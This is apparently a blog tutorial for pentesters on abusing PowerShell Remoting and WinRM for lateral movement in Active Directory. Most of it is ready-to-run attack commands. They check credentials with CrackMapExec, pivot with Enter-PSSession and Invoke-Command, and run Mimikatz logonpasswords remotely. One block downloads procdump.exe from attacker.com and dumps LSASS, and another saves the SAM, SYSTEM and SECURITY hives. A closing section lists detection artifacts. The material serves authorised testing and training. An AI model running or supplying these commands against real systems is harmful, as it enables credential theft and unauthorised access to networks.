/ AD - Bonus Content, Uncategorized / By

PowerShell Remoting for Pentesters

Introduction

PowerShell Remoting is like RDP without the GUI. It lets administrators (and attackers) run commands on remote systems over the network using the WinRM service. If you’ve got valid credentials and the right access, PowerShell Remoting becomes a stealthy, native post-exploitation tool — no implants, no noise, and no third-party agents required.

This guide breaks down what PowerShell Remoting is, how it works, how to enable it, and how to abuse it during a penetration test.

1. What Is PowerShell Remoting?

PowerShell Remoting uses the Windows Remote Management (WinRM) service to create an interactive PowerShell session with a remote system. This allows you to:

  • Run single commands (Invoke-Command)
  • Launch a full interactive shell (Enter-PSSession)
  • Execute scripts or dump data from many systems simultaneously

Default Ports:

  • HTTP (unencrypted unless using HTTPS or Kerberos): 5985
  • HTTPS (encrypted): 5986

2. Enabling PowerShell Remoting

On the target machine (with local or remote admin rights):

Enable-PSRemoting -Force
# Enables the WinRM listener and sets necessary firewall rules

3. Starting a Remote Session

Interactive Shell:

Enter-PSSession -ComputerName 192.168.56.101 -Credential corp\administrator
# Opens a shell on the remote machine

Non-Interactive Commands:

Invoke-Command -ComputerName 192.168.56.101 -ScriptBlock { Get-LocalUser } -Credential corp\administrator
# Runs the command remotely and returns output

4. Checking if a System Supports Remoting

Use Test-WSMan:

Test-WSMan 192.168.56.101
# Returns WinRM info if the system is reachable and WinRM is enabled

5. Abuse Scenario: Local Admin to Lateral Movement

Let’s say you’ve compromised a low-privileged domain user and found that their credentials are valid on another machine where they’re a local admin.

Step 1: Use CrackMapExec to Confirm Access

crackmapexec smb 10.0.0.10 -u svc_admin -p Password123
# Look for Pwn3d! to confirm admin access

Step 2: Use PowerShell Remoting to Pivot

Enter-PSSession -ComputerName 10.0.0.10 -Credential corp\svc_admin
# Use a shell to dump credentials or search for TGTs

If you already have a shell and want stealthier movement, try:

Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
  Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'
}

Or dump all local admins:

Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
  net localgroup administrators
}

6. Common Post-Exploitation Moves

Here’s what you can do once inside via PowerShell Remoting:

Dump LSASS with Procdump:

Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
  Invoke-WebRequest http://attacker.com/procdump.exe -OutFile C:\Temp\procdump.exe
  .\procdump.exe -ma lsass.exe lsass.dmp
}
# Download the dump and crack it offline

Pull SAM/SECURITY/ SYSTEM Registry Hives:

Invoke-Command -ComputerName 10.0.0.10 -ScriptBlock {
  reg save HKLM\SAM C:\Temp\SAM
  reg save HKLM\SYSTEM C:\Temp\SYSTEM
  reg save HKLM\SECURITY C:\Temp\SECURITY
}

7. Using PowerShell Remoting with PsRemoting Sessions

Instead of entering each time, you can build sessions and re-use them:

$session = New-PSSession -ComputerName 10.0.0.10 -Credential corp\svc_admin
Invoke-Command -Session $session -ScriptBlock { whoami }

Close session:

Remove-PSSession $session

8. Detecting and Defending (Blue Team View)

While this is offensive-focused, be aware of artifacts:

  • PowerShell logs in Event Viewer (ID 4104 for scripts, 4688 for process creation)
  • Network logs show WinRM traffic over 5985/5986
  • Credential theft triggers (e.g., LSASS access)

Conclusion

PowerShell Remoting is one of the stealthiest and most powerful tools in a pentester’s post-exploitation toolkit. If you’ve got creds and WinRM is open, you’re just a command away from remote control.

In an Active Directory environment, it’s not just about privilege escalation — it’s about pivoting through the environment with native tools, no noise, and maximum access.

Related Posts

Scroll to Top